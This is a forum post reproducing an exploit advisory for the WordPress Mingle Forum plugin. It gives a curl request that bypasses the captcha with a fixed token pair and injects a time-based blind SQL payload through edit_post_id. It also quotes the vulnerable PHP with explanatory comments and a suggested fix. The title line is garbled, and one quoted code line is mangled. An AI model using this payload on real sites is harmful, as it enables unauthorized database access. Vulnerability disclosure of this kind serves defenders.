
Старый 13.10.2011, 20:49
DeleTeeeX

Код:
# Exploit Title: WordPress Mingle Forum plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
 
---------------
Vulnerable code
---------------
    // Excerpt from the plugin's wpf-insert.php as quoted by the advisory; the code is
    // reproduced as-is and the "..." below marks lines the advisory author left out.
    // This guest-info filter only runs when edit_post_submit is ABSENT, so the edit
    // path further down (which requires edit_post_submit) never passes through it.
    if (!isset($_POST['edit_post_submit'])) {
        $errormsg = apply_filters('wpwf_check_guestinfo',"");
        if ($errormsg != "") {
            $error = true;
            wp_die($errormsg);
        }
    }
 
    // Captcha gate, consulted only when forum_captcha is on and nobody is logged in.
    // Both the encrypted token (wpf_security_check) and the answer it is compared
    // against (wpf_security_code) come from the same POST body, and the comparison
    // is a loose `==`. Per the inline note on the next lines, one fixed
    // ciphertext/plaintext pair ("MhWNow==" / "fail") satisfies it, which is what the
    // curl request above sends; wpf_str_decrypt itself is defined in
    // captcha/shared.php and is not shown here.
    if($options['forum_captcha'] == true && !$user_ID){
        include_once(WPFPATH."captcha/shared.php");
        $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
            if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
              // do nothing
            }
            else {
                $error = true;
                $msg = __("Security code does not match", "mingleforum");
                wp_die($msg);
            }
    }
 
    ...
 
    if(isset($_POST['edit_post_submit'])){
        // Subject: input_filter() and then removal of single quotes and backslashes.
        // Message and thread id pass through input_filter()/check_parms(), whose
        // behaviour is not visible in this excerpt. edit_post_id is read from POST
        // with no cast, no check_parms() and no other validation before the query.
        $myReplaceSub = array("'", "\\");
        $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
        $content = $mingleforum->input_filter($_POST['message']);
        $thread = $mingleforum->check_parms($_POST['thread_id']);
        $edit_post_id = $_POST['edit_post_id']; // raw POST value, used unquoted in the UPDATE below
 
        // Only presence of subject/message is checked; $error is not initialised
        // anywhere in this excerpt, so it relies on being set earlier in the file.
        if($subject == ""){
            $msg .= "".__("An error occured", "mingleforum")."";
            $msg .= ("".__("You must enter a subject", "mingleforum")."");
            $error = true;
        }
        elseif($content == ""){
            $msg .= "".__("An error occured", "mingleforum")."";
            $msg .= ("".__("You must enter a message", "mingleforum")."");
            $error = true;
        }
 
        if ($error) wp_die($msg);
 
        // The next line is mangled in this excerpt (it reads as a comment); the visible
        // tail shows the UPDATE on t_posts being built by interpolating $content,
        // $subject and $edit_post_id directly into the SQL string, with the id
        // unquoted. That string is what $sql holds when the query runs.
        //SECURITY FIX NEEDED t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
        // $wpdb->prepare() is handed the already-interpolated string and no value
        // arguments, so there are no placeholders to bind and nothing is escaped --
        // the call is equivalent to $wpdb->query($sql). The fix is to write the
        // query with %s / %d placeholders and pass $content, $subject and
        // $edit_post_id as separate prepare() arguments (and to cast the id to int).
        $wpdb->query($wpdb->prepare($sql)); // prepare() without placeholders or arguments: no escaping happens
 